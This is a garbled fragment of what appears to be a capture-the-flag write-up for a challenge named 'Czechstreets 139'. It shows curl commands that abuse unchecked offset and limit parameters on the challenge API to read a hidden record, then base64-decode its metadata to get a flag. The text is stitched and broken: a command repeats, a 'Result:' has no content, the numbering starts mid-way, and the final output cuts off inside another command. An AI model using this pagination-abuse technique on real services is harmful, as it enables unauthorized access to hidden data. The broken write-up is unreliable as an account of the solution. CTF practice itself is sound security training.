Czechstreets 139 ((link)) May 2026

curl -s "http://139.czechstreets.ctf/api/streets?offset=138&limit=1000000" | jq . Result:

In short: that lets us read arbitrary street objects, including the hidden one with id = 139 . 4️⃣ Exploiting the Bug 4.1 Crafting the request We want the object with id = 139 . The API returns records in order of id . By setting offset=138 and a huge limit we can retrieve the 139th entry: czechstreets 139

curl -s "http://139.czechstreets.ctf/api/streets?offset=138&limit=1000000" \ | jq -r '.[0].metadata' \ | base64 -d \ | jq -r .flag Output: curl -s "http://139